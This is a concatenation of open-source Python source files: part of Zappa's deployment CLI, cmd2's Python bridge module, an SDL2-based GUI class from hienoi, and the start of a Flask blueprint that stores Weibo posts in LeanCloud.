# Pass through remote config bucket and path
if self.remote_env:
settings_s = settings_s + "REMOTE_ENV='{0!s}'\n".format(
self.remote_env
)
# DEPRECATED. Use remote_env instead.
elif self.remote_env_bucket and self.remote_env_file:
settings_s = settings_s + "REMOTE_ENV='s3://{0!s}/{1!s}'\n".format(
self.remote_env_bucket, self.remote_env_file
)
# Local envs
env_dict = {}
if self.aws_region:
env_dict['AWS_REGION'] = self.aws_region
env_dict.update(dict(self.environment_variables))
# Environment variable keys can't be unicode
# https://github.com/Miserlou/Zappa/issues/604
try:
env_dict = dict((k.encode('ascii'), v) for (k, v) in env_dict.items())
except Exception: # pragma: no cover
raise ValueError("Environment variable keys must not be unicode.")
settings_s = settings_s + "ENVIRONMENT_VARIABLES={0}\n".format(
env_dict
)
# We can be environment-aware
settings_s = settings_s + "API_STAGE='{0!s}'\n".format((self.api_stage))
settings_s = settings_s + "PROJECT_NAME='{0!s}'\n".format((self.project_name))
if self.settings_file:
settings_s = settings_s + "SETTINGS_FILE='{0!s}'\n".format((self.settings_file))
else:
settings_s = settings_s + "SETTINGS_FILE=None\n"
if self.django_settings:
settings_s = settings_s + "DJANGO_SETTINGS='{0!s}'\n".format((self.django_settings))
else:
settings_s = settings_s + "DJANGO_SETTINGS=None\n"
# If slim handler, path to project zip
if self.stage_config.get('slim_handler', False):
settings_s += "ZIP_PATH='s3://{0!s}/{1!s}_current_project.zip'\n".format(self.s3_bucket_name, self.project_name)
# AWS Events function mapping
event_mapping = {}
events = self.stage_config.get('events', [])
for event in events:
arn = event.get('event_source', {}).get('arn')
function = event.get('function')
if arn and function:
event_mapping[arn] = function
settings_s = settings_s + "AWS_EVENT_MAPPING={0!s}\n".format(event_mapping)
# Authorizer config
authorizer_function = self.authorizer.get('function', None)
if authorizer_function:
settings_s += "AUTHORIZER_FUNCTION='{0!s}'\n".format(authorizer_function)
# Copy our Django app into root of our package.
# It doesn't work otherwise.
if self.django_settings:
base = __file__.rsplit(os.sep, 1)[0]
django_py = ''.join(os.path.join(base, 'ext', 'django_zappa.py'))
lambda_zip.write(django_py, 'django_zappa_app.py')
# Lambda requires a specific chmod
temp_settings = tempfile.NamedTemporaryFile(delete=False)
os.chmod(temp_settings.name, 0o644)
temp_settings.write(settings_s)
temp_settings.close()
lambda_zip.write(temp_settings.name, 'zappa_settings.py')
os.remove(temp_settings.name)
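    # Illustrative stage-config sketch for the slim-handler path above (stage
    # name and exclude pattern are made up):
    #   {"dev": {"slim_handler": true, "exclude": ["*.mp4"]}}
    # This builds two archives: one zip prefixed with the Lambda name holding
    # the project, and a second 'handler_...' zip holding just the handler
    # plus a freshly created handler virtualenv.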
def remove_local_zip(self):
"""
Remove our local zip file.
"""
if self.stage_config.get('delete_local_zip', True):
try:
if os.path.isfile(self.zip_path):
os.remove(self.zip_path)
if self.handler_path and os.path.isfile(self.handler_path):
os.remove(self.handler_path)
except Exception as e: # pragma: no cover
sys.exit(-1)
def remove_uploaded_zip(self):
"""
Remove the local and S3 zip file after uploading and updating.
"""
# Remove the uploaded zip from S3, because it is now registered.
if self.stage_config.get('delete_s3_zip', True):
self.zappa.remove_from_s3(self.zip_path, self.s3_bucket_name)
if self.stage_config.get('slim_handler', False):
# Need to keep the project zip as the slim handler uses it.
self.zappa.remove_from_s3(self.handler_path, self.s3_bucket_name)
def on_exit(self):
"""
Cleanup after the command finishes.
Always called: SystemExit, KeyboardInterrupt and any other Exception that occurs.
"""
if self.zip_path:
self.remove_uploaded_zip()
self.remove_local_zip()
def print_logs(self, logs, colorize=True, http=False, non_http=False):
"""
Parse, filter and print logs to the console.
"""
for log in logs:
timestamp = log['timestamp']
message = log['message']
if "START RequestId" in message:
continue
if "REPORT RequestId" in message:
continue
if "END RequestId" in message:
continue
if not colorize:
if http:
if self.is_http_log_entry(message.strip()):
print("[" + str(timestamp) + "] " + message.strip())
elif non_http:
if not self.is_http_log_entry(message.strip()):
print("[" + str(timestamp) + "] " + message.strip())
else:
print("[" + str(timestamp) + "] " + message.strip())
else:
if http:
if self.is_http_log_entry(message.strip()):
click.echo(click.style("[", fg='cyan') + click.style(str(timestamp), bold=True) + click.style("]", fg='cyan') + self.colorize_log_entry(message.strip()))
elif non_http:
if not self.is_http_log_entry(message.strip()):
click.echo(click.style("[", fg='cyan') + click.style(str(timestamp), bold=True) + click.style("]", fg='cyan') + self.colorize_log_entry(message.strip()))
else:
click.echo(click.style("[", fg='cyan') + click.style(str(timestamp), bold=True) + click.style("]", fg='cyan') + self.colorize_log_entry(message.strip()))
def is_http_log_entry(self, string):
"""
Determines if a log entry is an HTTP-formatted log string or not.
"""
# Debug event filter
if 'Zappa Event' in string:
return False
# IP address filter
for token in string.replace('\t', ' ').split(' '):
try:
if token.count('.') == 3 and token.replace('.', '').isnumeric():
return True
except Exception: # pragma: no cover
pass
return False
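    # A quick illustration (log lines are made up):
    #   '127.0.0.1 - GET / 200'     ->  True, it contains a dotted-quad token
    #   '[DEBUG] Zappa Event: {..}' ->  False, caught by the debug event filter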
def colorize_log_entry(self, string):
"""
Apply various heuristics to return a colorized version of a string.
If these fail, simply return the string in plaintext.
"""
final_string = string
try:
# First, do stuff in square brackets
inside_squares = re.findall(r'\[([^]]*)\]', string)
for token in inside_squares:
if token in ['CRITICAL', 'ERROR', 'WARNING', 'DEBUG', 'INFO', 'NOTSET']:
final_string = final_string.replace('[' + token + ']', click.style("[", fg='cyan') + click.style(token, fg='cyan', bold=True) + click.style("]", fg='cyan'))
else:
final_string = final_string.replace('[' + token + ']', click.style("[", fg='cyan') + click.style(token, bold=True) + click.style("]", fg='cyan'))
# Then do quoted strings
quotes = re.findall(r'"[^"]*"', string)
for token in quotes:
final_string = final_string.replace(token, click.style(token, fg="yellow"))
# And UUIDs
for token in final_string.replace('\t', ' ').split(' '):
try:
if token.count('-') == 4 and token.replace('-', '').isalnum():
final_string = final_string.replace(token, click.style(token, fg="magenta"))
except Exception: # pragma: no cover
pass
# And IP addresses
try:
if token.count('.') == 3 and token.replace('.', '').isnumeric():
final_string = final_string.replace(token, click.style(token, fg="red"))
except Exception: # pragma: no cover
pass
# And status codes
try:
if token in ['200']:
final_string = final_string.replace(token, click.style(token, fg="green"))
if token in ['400', '401', '403', '404', '405', '500']:
final_string = final_string.replace(token, click.style(token, fg="red"))
except Exception: # pragma: no cover
pass
# And Zappa Events
try:
if "Zappa Event:" in final_string:
final_string = final_string.replace("Zappa Event:", click.style("Zappa Event:", bold=True, fg="green"))
except Exception: # pragma: no cover
pass
# And dates
for token in final_string.split('\t'):
try:
is_date = parser.parse(token)
final_string = final_string.replace(token, click.style(token, fg="green"))
except Exception: # pragma: no cover
pass
final_string = final_string.replace('\t', ' ').replace(' ', ' ')
if final_string[0] != ' ':
final_string = ' ' + final_string
return final_string
except Exception as e: # pragma: no cover
return string
def execute_prebuild_script(self):
"""
Parse and execute the prebuild_script from the zappa_settings.
"""
(pb_mod_path, pb_func) = self.prebuild_script.rsplit('.', 1)
try: # Prefer prebuild script in working directory
if pb_mod_path.count('.') >= 1: # Prebuild script func is nested in a folder
(mod_folder_path, mod_name) = pb_mod_path.rsplit('.', 1)
mod_folder_path_fragments = mod_folder_path.split('.')
working_dir = os.path.join(os.getcwd(), *mod_folder_path_fragments)
else:
mod_name = pb_mod_path
working_dir = os.getcwd()
working_dir_importer = pkgutil.get_importer(working_dir)
module_ = working_dir_importer.find_module(mod_name).load_module(mod_name)
except (ImportError, AttributeError):
try: # Prebuild func might be in virtualenv
module_ = importlib.import_module(pb_mod_path)
except ImportError: # pragma: no cover
raise ClickException(click.style("Failed ", fg="red") + 'to ' + click.style(
"import prebuild script ", bold=True) + 'module: "{pb_mod_path}"'.format(
pb_mod_path=click.style(pb_mod_path, bold=True)))
if not hasattr(module_, pb_func): # pragma: no cover
raise ClickException(click.style("Failed ", fg="red") + 'to ' + click.style(
"find prebuild script ", bold=True) + 'function: "{pb_func}" '.format(
pb_func=click.style(pb_func, bold=True)) + 'in module "{pb_mod_path}"'.format(
pb_mod_path=pb_mod_path))
prebuild_function = getattr(module_, pb_func)
prebuild_function() # Call the function
def collision_warning(self, item):
"""
Given a string, print a warning if this could
collide with a Zappa core package module.
Use for app functions and events.
"""
namespace_collisions = [
"zappa.", "wsgi.", "middleware.", "handler.", "util.", "letsencrypt.", "cli."
]
for namespace_collision in namespace_collisions:
if namespace_collision in item:
click.echo(click.style("Warning!", fg="red", bold=True) +
" You may have a namespace collision with " + click.style(item, bold=True) +
"! You may want to rename that file.")
def deploy_api_gateway(self, api_id):
cache_cluster_enabled = self.stage_config.get('cache_cluster_enabled', False)
cache_cluster_size = str(self.stage_config.get('cache_cluster_size', .5))
endpoint_url = self.zappa.deploy_api_gateway(
api_id=api_id,
stage_name=self.api_stage,
cache_cluster_enabled=cache_cluster_enabled,
cache_cluster_size=cache_cluster_size,
cloudwatch_log_level=self.stage_config.get('cloudwatch_log_level', 'OFF'),
cloudwatch_data_trace=self.stage_config.get('cloudwatch_data_trace', False),
cloudwatch_metrics_enabled=self.stage_config.get('cloudwatch_metrics_enabled', False),
)
return endpoint_url
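    # Illustrative stage-config sketch for the knobs read above (values are
    # made up; 1.6 is one of the cache sizes API Gateway accepts):
    #   {"dev": {"cache_cluster_enabled": true, "cache_cluster_size": 1.6,
    #            "cloudwatch_log_level": "INFO", "cloudwatch_data_trace": false,
    #            "cloudwatch_metrics_enabled": false}}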
####################################################################
# Main
####################################################################
def shamelessly_promote():
"""
Shamelessly promote our little community.
"""
click.echo("Need " + click.style("help", fg='green', bold=True) +
"? Found a " + click.style("bug", fg='green', bold=True) +
"? Let us " + click.style("know", fg='green', bold=True) + "! :D")
click.echo("File bug reports on " + click.style("GitHub", bold=True) + " here: "
+ click.style("https://github.com/Miserlou/Zappa", fg='cyan', bold=True))
click.echo("And join our " + click.style("Slack", bold=True) + " channel here: "
+ click.style("https://slack.zappa.io", fg='cyan', bold=True))
click.echo("Love!,")
click.echo(" ~ Team " + click.style("Zappa", bold=True) + "!")
def handle(): # pragma: no cover
"""
Main program execution handler.
"""
try:
cli = ZappaCLI()
sys.exit(cli.handle())
except SystemExit as e: # pragma: no cover
cli.on_exit()
sys.exit(e.code)
except KeyboardInterrupt: # pragma: no cover
cli.on_exit()
sys.exit(130)
except Exception as e:
cli.on_exit()
click.echo("Oh no! An " + click.style("error occurred", fg='red', bold=True) + "! :(")
click.echo("\n==============\n")
import traceback
traceback.print_exc()
click.echo("\n==============\n")
shamelessly_promote()
sys.exit(-1)
if __name__ == '__main__': # pragma: no cover
handle()
|
parroyo/Zappa
|
zappa/cli.py
|
Python
|
mit
| 87,982
|
# coding=utf-8
"""
Bridges calls made inside of a Python environment to the Cmd2 host app
while maintaining a reasonable degree of isolation between the two.
"""
import sys
from contextlib import (
redirect_stderr,
redirect_stdout,
)
from typing import (
IO,
TYPE_CHECKING,
Any,
List,
NamedTuple,
Optional,
TextIO,
Union,
cast,
)
from .utils import ( # namedtuple_with_defaults,
StdSim,
)
if TYPE_CHECKING: # pragma: no cover
import cmd2
class CommandResult(NamedTuple):
"""Encapsulates the results from a cmd2 app command
:stdout: str - output captured from stdout while this command is executing
:stderr: str - output captured from stderr while this command is executing
:stop: bool - return value of onecmd_plus_hooks after it runs the given
command line.
:data: possible data populated by the command.
Any combination of these fields can be used when developing a scripting API
for a given command. By default stdout, stderr, and stop will be captured
for you. If there is additional command specific data, then write that to
cmd2's last_result member. That becomes the data member of this tuple.
In some cases, the data member may contain everything needed for a command
and storing stdout and stderr might just be a duplication of data that
wastes memory. In that case, the StdSim can be told not to store output
with its pause_storage member. While this member is True, any output sent
to StdSim won't be saved in its buffer.
The code would look like this::
if isinstance(self.stdout, StdSim):
self.stdout.pause_storage = True
if isinstance(sys.stderr, StdSim):
sys.stderr.pause_storage = True
See :class:`~cmd2.utils.StdSim` for more information.
.. note::
Named tuples are immutable. The contents are there for access,
not for modification.
"""
stdout: str = ''
stderr: str = ''
stop: bool = False
data: Any = None
def __bool__(self) -> bool:
"""Returns True if the command succeeded, otherwise False"""
# If data was set, then use it to determine success
if self.data is not None:
return bool(self.data)
# Otherwise check if stderr was filled out
else:
return not self.stderr
class PyBridge:
"""Provides a Python API wrapper for application commands."""
def __init__(self, cmd2_app: 'cmd2.Cmd') -> None:
self._cmd2_app = cmd2_app
self.cmd_echo = False
# Tells if any of the commands run via __call__ returned True for stop
self.stop = False
def __dir__(self) -> List[str]:
"""Return a custom set of attribute names"""
attributes: List[str] = []
attributes.insert(0, 'cmd_echo')
return attributes
def __call__(self, command: str, *, echo: Optional[bool] = None) -> CommandResult:
"""
Provide functionality to call application commands by calling PyBridge
ex: app('help')
:param command: command line being run
:param echo: If provided, this temporarily overrides the value of self.cmd_echo while the
command runs. If True, output will be echoed to stdout/stderr. (Defaults to None)
"""
if echo is None:
echo = self.cmd_echo
# This will be used to capture _cmd2_app.stdout and sys.stdout
copy_cmd_stdout = StdSim(cast(Union[TextIO, StdSim], self._cmd2_app.stdout), echo=echo)
# Pause the storing of stdout until onecmd_plus_hooks enables it
copy_cmd_stdout.pause_storage = True
# This will be used to capture sys.stderr
copy_stderr = StdSim(sys.stderr, echo=echo)
self._cmd2_app.last_result = None
stop = False
try:
self._cmd2_app.stdout = cast(TextIO, copy_cmd_stdout)
with redirect_stdout(cast(IO[str], copy_cmd_stdout)):
with redirect_stderr(cast(IO[str], copy_stderr)):
stop = self._cmd2_app.onecmd_plus_hooks(command, py_bridge_call=True)
finally:
with self._cmd2_app.sigint_protection:
self._cmd2_app.stdout = cast(IO[str], copy_cmd_stdout.inner_stream)
self.stop = stop or self.stop
# Save the result
result = CommandResult(
stdout=copy_cmd_stdout.getvalue(),
stderr=copy_stderr.getvalue(),
stop=stop,
data=self._cmd2_app.last_result,
)
return result
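# Illustrative usage sketch (assumes `app` is an instance of this bridge that
# the host cmd2 application has exposed to an embedded Python session):
#   result = app('help', echo=False)
#   if result:                # truthiness comes from CommandResult.__bool__
#       print(result.stdout)  # output captured while 'help' ran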
|
python-cmd2/cmd2
|
cmd2/py_bridge.py
|
Python
|
mit
| 4,605
|
"""Graphical user interface."""
import collections
import ctypes
import sdl2
import hienoi.renderer
from hienoi._common import GLProfile, GraphicsAPI, ParticleDisplay, UserData
from hienoi._vectors import Vector2i, Vector2f, Vector4f
class NavigationAction(object):
"""Enumerator for the current nagivation action.
Attributes
----------
NONE
MOVE
ZOOM
"""
NONE = 0
MOVE = 1
ZOOM = 2
_Handles = collections.namedtuple(
'_Handles', (
'window',
'renderer',
))
_GLHandles = collections.namedtuple(
'_GLHandles', (
'context',
))
_RGBMasks = collections.namedtuple(
'_RGBMasks', (
'red',
'green',
'blue',
))
_FIT_VIEW_REL_PADDING = 2.0
if sdl2.SDL_BYTEORDER == sdl2.SDL_LIL_ENDIAN:
_RGB_MASKS = _RGBMasks(red=0x000000FF, green=0x0000FF00, blue=0x00FF0000)
else:
_RGB_MASKS = _RGBMasks(red=0x00FF0000, green=0x0000FF00, blue=0x000000FF)
class GUI(object):
"""GUI.
Parameters
----------
window_title : str
Title for the window.
window_position : hienoi.Vector2i
Initial window position.
window_size : hienoi.Vector2i
Initial window size.
window_flags : int
SDL2 window flags.
view_aperture_x : float
Initial length in world units to be shown on the X axis.
view_zoom_range : hienoi.Vector2f
Zoom value range for the view.
mouse_wheel_step : float
Coefficient value for each mouse wheel step.
grid_density : float
See :attr:`GUI.grid_density`.
grid_adaptive_threshold : float
See :attr:`GUI.grid_adaptive_threshold`.
show_grid : bool
See :attr:`GUI.show_grid`.
background_color : hienoi.Vector4f
See :attr:`GUI.background_color`.
grid_color : hienoi.Vector4f
See :attr:`GUI.grid_color`.
grid_origin_color : hienoi.Vector4f
See :attr:`GUI.grid_origin_color`.
particle_display : int
See :attr:`GUI.particle_display`.
point_size : int
See :attr:`GUI.point_size`.
edge_feather : float
See :attr:`GUI.edge_feather`.
stroke_width : float
See :attr:`GUI.stroke_width`.
initialize_callback : function
Callback function to initialize any GUI state.
It takes a single argument ``gui``, an instance of this class.
on_event_callback : function
Callback function ran during the event polling.
It takes 3 arguments: ``gui``, an instance of this class,
``data``, some data to pass back and forth between the caller and this
callback function, and ``event``, the event fired.
renderer : dict
Keyword arguments for the configuration of the renderer. See the
parameters for the class :class:`hienoi.renderer.Renderer`.
Attributes
----------
view_position : hienoi.Vector2f
Position of the view (camera).
view_zoom : float
Current zoom value for the view.
grid_density : float
Density of the grid.
A density of 10.0 means that there are around 10 grid divisions
displayed on the X axis. A grid division unit represents a fixed length
in world units, meaning that the actual grid density changes depending
on the view's zoom.
show_grid : bool
True to show the grid.
background_color : hienoi.Vector4f
Color for the background.
grid_color : hienoi.Vector4f
Color for the grid.
grid_origin_color : hienoi.Vector4f
Color for the origin axis of the grid.
particle_display : int
Display mode for the particles. Available values are enumerated in the
:class:`~hienoi.ParticleDisplay` class.
point_size : int
Size of the particles in pixels when the display mode is set to
:attr:`~hienoi.ParticleDisplay.POINT`.
edge_feather : float
Feather fall-off in pixels to apply to objects drawn with displays such
as :attr:`~hienoi.ParticleDisplay.CIRCLE` or
:attr:`~hienoi.ParticleDisplay.DISC`.
stroke_width : float
Width of the stroke in pixels to apply to objects drawn with displays
such as :attr:`~hienoi.ParticleDisplay.CIRCLE`.
quit : bool
``True`` to signal to the application that it should quit.
has_view_changed : bool
``True`` if the view state has just been changed following an event. It
is reset to ``False`` whenever :meth:`poll_events` is called.
user_data : object
Attribute reserved for any user data.
"""
def __init__(self,
window_title='hienoi',
window_position=Vector2i(sdl2.SDL_WINDOWPOS_CENTERED,
sdl2.SDL_WINDOWPOS_CENTERED),
window_size=Vector2i(800, 600),
window_flags=sdl2.SDL_WINDOW_RESIZABLE,
view_aperture_x=100.0,
view_zoom_range=Vector2f(1e-6, 1e+6),
mouse_wheel_step=0.01,
grid_density=10.0,
grid_adaptive_threshold=3.0,
show_grid=True,
background_color=Vector4f(0.15, 0.15, 0.15, 1.0),
grid_color=Vector4f(0.85, 0.85, 0.85, 0.05),
grid_origin_color=Vector4f(0.85, 0.25, 0.25, 0.25),
particle_display=ParticleDisplay.DISC,
point_size=4,
edge_feather=2.0,
stroke_width=0.0,
initialize_callback=None,
on_event_callback=None,
renderer=None):
renderer = {} if renderer is None else renderer
if sdl2.SDL_Init(sdl2.SDL_INIT_VIDEO) != 0:
raise RuntimeError(sdl2.SDL_GetError().decode())
renderer_info = hienoi.renderer.get_info()
if renderer_info.api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_MAJOR_VERSION,
renderer_info.major_version)
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_MINOR_VERSION,
renderer_info.minor_version)
if renderer_info.profile == GLProfile.CORE:
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_PROFILE_MASK,
sdl2.SDL_GL_CONTEXT_PROFILE_CORE)
self._handles = _create_handles(window_title, window_position,
window_size, window_flags,
renderer_info)
self._renderer = hienoi.renderer.Renderer(**renderer)
self._initial_view_aperture_x = view_aperture_x
self._view_zoom_range = view_zoom_range
self._mouse_wheel_step = mouse_wheel_step
self._grid_adaptive_threshold = grid_adaptive_threshold
self._on_event_callback = on_event_callback
self._listen_for_navigation = False
self._is_view_manipulated = False
self.view_position = Vector2f(0.0, 0.0)
self._view_zoom = 1.0
self.grid_density = grid_density
self.show_grid = show_grid
self.background_color = background_color
self.grid_color = grid_color
self.grid_origin_color = grid_origin_color
self.particle_display = particle_display
self.point_size = point_size
self.edge_feather = edge_feather
self.stroke_width = stroke_width
self._navigation_action = NavigationAction.NONE
self.quit = False
self.user_data = UserData()
if initialize_callback:
initialize_callback(self)
@property
def view_zoom(self):
return self._view_zoom
@view_zoom.setter
def view_zoom(self, value):
self._view_zoom = max(self._view_zoom_range[0],
min(self._view_zoom_range[1], value))
@property
def navigation_action(self):
return self._navigation_action
@property
def has_view_changed(self):
return self._has_view_changed
def poll_events(self, scene_state, data=None):
"""Process each event in the queue.
Parameters
----------
scene_state : hienoi.renderer.SceneState
Scene state.
data : object
Data to pass back and forth between the caller and the function set
for the 'on event' callback.
"""
self._has_view_changed = False
event = sdl2.SDL_Event()
while sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
event_type = event.type
if event_type == sdl2.SDL_QUIT:
self._on_quit_event(event.quit)
elif event_type == sdl2.SDL_WINDOWEVENT:
self._on_window_event(event.window)
elif event_type == sdl2.SDL_KEYDOWN:
self._on_key_down_event(event.key, scene_state)
elif event_type == sdl2.SDL_KEYUP:
self._on_key_up_event(event.key)
elif event_type == sdl2.SDL_MOUSEBUTTONDOWN:
self._on_mouse_button_down_event(event.button)
elif event_type == sdl2.SDL_MOUSEBUTTONUP:
self._on_mouse_button_up_event(event.button)
elif event_type == sdl2.SDL_MOUSEWHEEL:
self._on_mouse_wheel_event(event.wheel)
elif event_type == sdl2.SDL_MOUSEMOTION:
self._on_mouse_motion_event(event.motion)
if self._on_event_callback:
self._on_event_callback(self, data, event)
if self.quit:
break
def render(self, scene_state):
"""Render a new frame.
Parameters
----------
scene_state : hienoi.renderer.SceneState
Scene state.
"""
renderer_state = hienoi.renderer.State(
window_size=self.get_window_size(),
view_position=self.view_position,
view_zoom=self._view_zoom,
origin=self.world_to_screen(Vector2f(0.0, 0.0)),
initial_view_aperture_x=self._initial_view_aperture_x,
view_aperture=self.get_view_aperture(),
grid_density=self.grid_density,
grid_adaptive_threshold=self._grid_adaptive_threshold,
background_color=self.background_color,
grid_color=self.grid_color,
grid_origin_color=self.grid_origin_color,
show_grid=self.show_grid,
particle_display=self.particle_display,
point_size=self.point_size,
edge_feather=self.edge_feather,
stroke_width=self.stroke_width,
)
self._renderer.render(renderer_state, scene_state)
if hienoi.renderer.get_info().api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_SwapWindow(self._handles.window)
def terminate(self):
"""Cleanup the GUI resources."""
self._renderer.cleanup()
if hienoi.renderer.get_info().api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_DeleteContext(self._handles.renderer.context)
sdl2.SDL_DestroyWindow(self._handles.window)
sdl2.SDL_Quit()
def get_window_size(self):
"""Retrieve the window size.
Returns
-------
hienoi.Vector2i
The window size.
"""
window_size_x = ctypes.c_int()
window_size_y = ctypes.c_int()
sdl2.SDL_GetWindowSize(self._handles.window,
ctypes.byref(window_size_x),
ctypes.byref(window_size_y))
return Vector2i(window_size_x.value, window_size_y.value)
def get_view_aperture(self):
"""Retrieve the view aperture.
It represents the area in world units covered by the view.
Returns
-------
hienoi.Vector2f
The view aperture.
"""
window_size = self.get_window_size()
aperture_x = self._initial_view_aperture_x / self._view_zoom
return Vector2f(aperture_x, aperture_x * window_size.y / window_size.x)
def get_mouse_position(self):
"""Retrieve the mouse position in screen space.
Returns
-------
hienoi.Vector2i
The mouse position.
"""
position_x = ctypes.c_int()
position_y = ctypes.c_int()
sdl2.SDL_GetMouseState(ctypes.byref(position_x),
ctypes.byref(position_y))
return Vector2i(position_x.value, position_y.value)
def get_screen_to_world_ratio(self):
"""Retrieve the ratio to convert a sreen unit into a world unit.
Returns
-------
float
The screen to world ratio.
"""
window_size = self.get_window_size()
aperture_x = self._initial_view_aperture_x / self._view_zoom
return aperture_x / window_size.x
def screen_to_world(self, point):
"""Convert a point from screen space to world space coordinates.
Parameters
----------
point : hienoi.Vector2i
Point in screen space coordinates.
Returns
-------
hienoi.Vector2f
The point in world space coordinates.
"""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
return Vector2f(
(self.view_position.x
+ (point.x - window_size.x / 2.0)
* view_aperture.x / window_size.x),
(self.view_position.y
- (point.y - window_size.y / 2.0)
* view_aperture.y / window_size.y))
def world_to_screen(self, point):
"""Convert a point from world space to screen space coordinates.
Parameters
----------
point : hienoi.Vector2f
Point in world space coordinates.
Returns
-------
hienoi.Vector2i
The point in screen space coordinates.
"""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
return Vector2i(
int(round(
(window_size.x / view_aperture.x)
* (-self.view_position.x + point.x + view_aperture.x / 2.0))),
int(round(
(window_size.y / view_aperture.y)
* (self.view_position.y - point.y + view_aperture.y / 2.0))))
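    # Round-trip sketch, assuming the defaults above (view centered on the
    # origin, zoom 1.0, view_aperture_x 100.0) and an 800x600 window:
    #   world_to_screen(Vector2f(0.0, 0.0))  ->  Vector2i(400, 300)
    #   screen_to_world(Vector2i(400, 300))  ->  Vector2f(0.0, 0.0)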
def write_snapshot(self, filename):
"""Take a snapshot of the view and write it as a BMP image.
Parameters
----------
filename : str
Destination filename.
"""
pixel_size = 4
pixels = self._renderer.read_pixels()
surface = sdl2.SDL_CreateRGBSurfaceFrom(
pixels.data, pixels.width, pixels.height,
8 * pixel_size, pixels.width * pixel_size,
_RGB_MASKS.red, _RGB_MASKS.green, _RGB_MASKS.blue, 0)
sdl2.SDL_SaveBMP(surface, filename)
sdl2.SDL_FreeSurface(surface)
def _reset_view(self):
"""Reset the view position and zoom."""
self.view_position = Vector2f(0.0, 0.0)
self.view_zoom = 1.0
self._has_view_changed = True
def _fit_view(self, scene_state):
"""Fit the view to the scene."""
if len(scene_state.particles) > 1:
window_size = self.get_window_size()
initial_size = Vector2f(
self._initial_view_aperture_x,
self._initial_view_aperture_x * window_size.y / window_size.x)
lower_bounds = scene_state.lower_bounds
upper_bounds = scene_state.upper_bounds
required_size = (upper_bounds - lower_bounds).iscale(
_FIT_VIEW_REL_PADDING)
required_size = Vector2f(
max(required_size.x,
initial_size.x * self._view_zoom_range[0]),
max(required_size.y,
initial_size.y * self._view_zoom_range[0]))
self.view_position = (lower_bounds + upper_bounds).iscale(0.5)
self.view_zoom = min(initial_size.x / required_size.x,
initial_size.y / required_size.y)
elif len(scene_state.particles) == 1:
self.view_position = Vector2f(
*scene_state.particles['position'][0])
self.view_zoom = 1.0
else:
self._reset_view()
self._has_view_changed = True
def _on_quit_event(self, event):
"""Event 'on quit'."""
self.quit = True
def _on_window_event(self, event):
"""Event 'on window'."""
if event.event == sdl2.SDL_WINDOWEVENT_SIZE_CHANGED:
self._renderer.resize(event.data1, event.data2)
def _on_key_down_event(self, event, scene_state):
"""Event 'on key down'."""
code = event.keysym.sym
modifier = event.keysym.mod
if modifier == sdl2.KMOD_NONE:
if code == sdl2.SDLK_SPACE:
self._listen_for_navigation = True
elif code == sdl2.SDLK_d:
self.particle_display = (
(self.particle_display + 1) % (ParticleDisplay._LAST + 1))
elif code == sdl2.SDLK_f:
self._fit_view(scene_state)
elif code == sdl2.SDLK_g:
self.show_grid = not self.show_grid
elif code == sdl2.SDLK_r:
self._reset_view()
def _on_key_up_event(self, event):
"""Event 'on key up'."""
code = event.keysym.sym
if code == sdl2.SDLK_SPACE:
self._listen_for_navigation = False
def _on_mouse_button_down_event(self, event):
"""Event 'on mouse button down'."""
if self._listen_for_navigation:
if event.button == sdl2.SDL_BUTTON_LEFT:
self._navigation_action = NavigationAction.MOVE
elif event.button == sdl2.SDL_BUTTON_RIGHT:
self._navigation_action = NavigationAction.ZOOM
def _on_mouse_button_up_event(self, event):
"""Event 'on mouse button up'."""
if (event.button == sdl2.SDL_BUTTON_LEFT
or event.button == sdl2.SDL_BUTTON_RIGHT):
self._navigation_action = NavigationAction.NONE
def _on_mouse_wheel_event(self, event):
"""Event 'on mouse wheel'."""
scale = 1.0 + self._mouse_wheel_step * event.y
self.view_zoom *= scale
self._has_view_changed = True
def _on_mouse_motion_event(self, event):
"""Event 'on mouse motion'."""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
if self._navigation_action == NavigationAction.MOVE:
self.view_position.set(
(self.view_position.x
- event.xrel * view_aperture.x / window_size.x),
(self.view_position.y
+ event.yrel * view_aperture.y / window_size.y))
self._has_view_changed = True
elif self._navigation_action == NavigationAction.ZOOM:
scale = (1.0
+ float(event.xrel) / window_size.x
- float(event.yrel) / window_size.y)
self.view_zoom *= scale
self._has_view_changed = True
def _create_handles(window_title, window_position, window_size, window_flags,
renderer_info):
"""Create the SDL2 handles."""
window_flags = sdl2.SDL_WINDOW_SHOWN | window_flags
if renderer_info.api == GraphicsAPI.OPENGL:
window_flags |= sdl2.SDL_WINDOW_OPENGL
window = sdl2.SDL_CreateWindow(
window_title.encode(),
window_position.x, window_position.y,
window_size.x, window_size.y,
window_flags)
if not window:
raise RuntimeError(sdl2.SDL_GetError().decode())
context = sdl2.SDL_GL_CreateContext(window)
if not context:
raise RuntimeError(sdl2.SDL_GetError().decode())
# Try to disable the vertical synchronization. It applies to the active
# context and thus needs to be called after `SDL_GL_CreateContext`.
sdl2.SDL_GL_SetSwapInterval(0)
return _Handles(
window=window,
renderer=_GLHandles(context=context))
|
christophercrouzet/hienoi
|
hienoi/gui.py
|
Python
|
mit
| 20,220
|
# coding: utf-8
from leancloud import Object
from leancloud import Query
from leancloud import LeanCloudError
from flask import Blueprint
from flask import request
from flask import redirect
from flask import url_for
from flask import render_template
import sys
sys.path.insert(0,'../')
from utils import JsonDict
import logging
import json
class Weibo(Object):
pass
weibos_handler = Blueprint('weibos', __name__)
@weibos_handler.route('', methods=['GET'])
def show():
try:
weibos = Query(Weibo).descending('createdAt').find()
except LeanCloudError, e:
# The Weibo class does not exist on the server yet
if e.code == 101:
weibos = []
else:
raise e
return render_template('weibos.html', weibos=weibos)
"""
try:
todos = Query(Todo).descending('createdAt').find()
except LeanCloudError, e:
if e.code == 101:  # The corresponding class has not been created on the server yet
todos = []
else:
raise e
return render_template('todos.html', todos=todos)
"""
@weibos_handler.route('', methods=['POST'])
def add():
# Get the weibo data from one page of search results
weibos = request.json['weibos']
# Save these weibo entries to LeanCloud
new_mid_list = []
for _weibo in weibos:
_weibo = JsonDict(_weibo)
# Check whether this weibo has already been saved
